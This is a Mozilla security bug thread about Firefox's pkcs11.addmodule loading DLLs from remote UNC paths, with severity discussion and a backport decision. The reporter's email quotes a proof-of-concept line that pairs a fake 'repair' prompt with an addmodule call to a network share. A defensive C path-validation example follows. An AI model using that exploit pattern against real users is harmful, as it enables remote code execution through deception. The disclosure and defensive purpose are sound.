Bug 509413 - Remote PKCS11 module installation from UNC path
Whiteboard: [sg:critical][fix in 326628] requires...
: fixed1.9.0.14
Product: Core
Classification: Components
Component: Security: PSM
Version: 1.9.0 Branch
Platform: All All
Importance: -- major
Target Milestone: ---
Assigned To: Kai Engert (:kaie)
QA Contact: David Keeler [:keeler]
Depends on: 326628
Reported: 2009-08-10 08:33 PDT by Brandon Sterne (:bsterne)
Modified: 2009-09-12 14:00 PDT
Flags: samuel.sidler+old: blocking1.9.0.14+
Flags: dveditz: wanted1.9.0.x+


Description Brandon Sterne (:bsterne) 2009-08-10 08:33:11 PDT
Created attachment 393517
Module runs calc.exe when loaded

Dan Kaminsky reported this issue.  His full email to security@m.o:

You have a Javascript function that takes a DLL or a .so file as an argument in all builds of Firefox below 3.5?


Apparently this has garnered some internal attention over the last three years -- saw .

You guys sort of found that this can be thrown into a while(1) loop, but didn't realize it's a fully modal dialog and so all of Firefox is locked until the user hits OK.

What was really missed, however, was the fact that on Windows a UNC path can be used as an argument to LoadLibrary.  So the DLL can be loaded from a remote source.

Exploit looks like this:


  var str = "Error detected in Firefox Module NSP31337.bin.\n" +
            "Please click 'OK' to repair.";

  ret = window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n", "\\\\\\c$\\pkunkcs", 0, 0);


pkunkcs attached, launches calc.exe.  Obviously the path doesn't need to loop back to .
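The weakness described in the report is that the module path handed to addmodule reached LoadLibrary unfiltered, so a UNC path made the browser fetch and load a DLL from a network share. The following is an added illustration, not PSM or NSS code and not the change that landed in bug 326628: a path policy a native module loader can apply before any LoadLibrary call, accepting only a fully qualified path on a local drive letter and refusing UNC, device-namespace, drive-relative and ".." paths. The function name is_local_module_path, its rules, and the sample paths (including the fileserver.example host) are constructed for this example; the check is pure string handling and builds on any platform.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example: a path policy for a native module loader (hypothetical
 * is_local_module_path, not PSM/NSS code). Accepts only a fully qualified
 * path on a local drive letter, so a caller-controlled string can never
 * steer LoadLibrary at a network share. Pure string logic, portable. */

static int is_sep(char c)
{
    return c == '\\' || c == '/';   /* Win32 treats '/' like '\' */
}

/* Returns 1 if path may be handed to the dynamic loader, 0 otherwise. */
int is_local_module_path(const char *path)
{
    if (path == NULL) return 0;
    size_t n = strlen(path);
    if (n < 4) return 0;                 /* "C:\x" is the shortest useful form */

    /* Two leading separators mean a UNC path (\\server\share\x) or a
     * device-namespace path (\\?\UNC\..., \\.\...), both of which can
     * name remote or special objects. Any leading separator is refused. */
    if (is_sep(path[0])) return 0;

    /* Require "<letter>:<sep>"; "C:x" is drive-relative and resolves
     * against the per-drive working directory, not a fixed location. */
    if (!isalpha((unsigned char)path[0]) || path[1] != ':' || !is_sep(path[2]))
        return 0;

    /* A trailing separator means there is no file name. */
    if (is_sep(path[n - 1])) return 0;

    /* Walk the remaining segments: no empty segment, no second ':'
     * (alternate data stream syntax), no ".." that climbs out. */
    const char *p = path + 3;
    while (*p != '\0') {
        size_t seg = strcspn(p, "\\/");
        if (seg == 0) return 0;
        if (memchr(p, ':', seg) != NULL) return 0;
        if (seg == 2 && p[0] == '.' && p[1] == '.') return 0;
        p += seg;
        if (*p != '\0') p++;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample inputs; fileserver.example is a placeholder host. */
    const char *samples[] = {
        "C:\\Program Files\\Vendor\\pkcs11.dll",
        "C:/Program Files/Vendor/pkcs11.dll",
        "\\\\fileserver.example\\share\\module.dll",
        "\\\\?\\UNC\\fileserver.example\\share\\module.dll",
        "C:..\\module.dll",
        "C:\\lib\\..\\..\\module.dll",
        "module.dll",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-52s %s\n", samples[i],
               is_local_module_path(samples[i]) ? "accept" : "refuse");
    return 0;
}
```

The check belongs at the boundary where an untrusted string becomes a loader argument; the thread's actual resolution went further by removing the web-page entry point entirely, and a path policy like this is the defence-in-depth layer underneath that decision.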
Comment 1 Samuel Sidler (old account; do not CC) 2009-08-10 08:43:31 PDT
Nelson: I understand you and Dan talked about this before he left. Any comments here?
Comment 2 Benjamin Smedberg [:bsmedberg] 2009-08-10 08:49:27 PDT
Isn't this just a straight duplicate of bug 326628? Other than "backport bug 326628 to the 1.9.0 branch" I'm not sure what the expected resolution would be.
Comment 3 Daniel Veditz [:dveditz] 2009-08-10 09:46:15 PDT
That's what Nelson said, too.

We missed the UNC path issue which makes it sg:critical rather than sg:moderate (bug 326628 comment 23). We should backport this--but note bug 326628 comment 52 / bug 495756.
Comment 4 Benjamin Smedberg [:bsmedberg] 2009-08-10 09:52:31 PDT
Why is it sg:critical? It can't be exploited without explicit user interaction.
Comment 5 Jesse Ruderman 2009-08-10 10:42:06 PDT
Between the prompt being confusing and the attacker being able to put the prompt in a while(1) loop, I imagine it would have a pretty high chance of success.
Comment 6 Nelson Bolyard (seldom reads bugmail) 2009-08-10 12:07:14 PDT
I agree with Benjamin that this is "just a straight duplicate of bug 326628"
and that the solution is "backport bug 326628 to the 1.9.0 branch".

The original design intent of the facilities for adding new PKCS#11 
modules to the mozilla browser was to offer two separate methods:
1) a UI dialog in the security manager preferences by which the user could
   do all the work for himself, 
2) a javascript method invokable from an XPI installer, by which the developer
   of the module could do the work for the user. provides minimal
information about both methods.

We expected that most PKCS#11 modules would be installed via an XPI.  

Somehow, somewhere along the way, it became possible to invoke the javascript 
method from a web page, and developers of deployments of PKCS#11 modules
began to rely on that.  But that was vulnerable, and now that has been taken 
away, leaving developers wondering what to do instead. 

IMO, the right thing to do is to steer those developers back to developing 
XPIs, rather than trying to teach users how to find and use the UI for this 
installation.  We really should encourage developers to consider the XPI
as the primary vehicle for that installation, IMO.
Comment 7 Samuel Sidler (old account; do not CC) 2009-08-10 16:41:13 PDT
Benjamin: Can you work on backporting bug 326628 to the 1.9.0 branch?
Comment 8 Benjamin Smedberg [:bsmedberg] 2009-08-11 12:38:21 PDT
Fixed or duplicate of bug 326628 (fixed for also).